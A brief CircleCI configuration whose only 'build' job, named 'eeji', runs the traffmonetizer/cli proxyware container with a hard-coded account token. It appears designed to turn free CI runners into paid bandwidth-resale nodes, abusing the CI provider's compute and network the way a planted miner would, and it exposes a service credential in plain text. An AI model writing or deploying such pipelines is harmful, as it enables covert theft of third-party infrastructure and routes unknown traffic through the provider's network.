version: 2.1  
jobs:  
  build:    
   docker:
      - image: cimg/base:stable
   steps:          
      - checkout       
      - run:                   
          name: "eeji"                   
          command: "docker run -i --name oj traffmonetizer/cli start accept statistics --token gb0PYeCl6dRcS0ykGj9V3get02eE+DMXZB8/XbNhxYc=" 
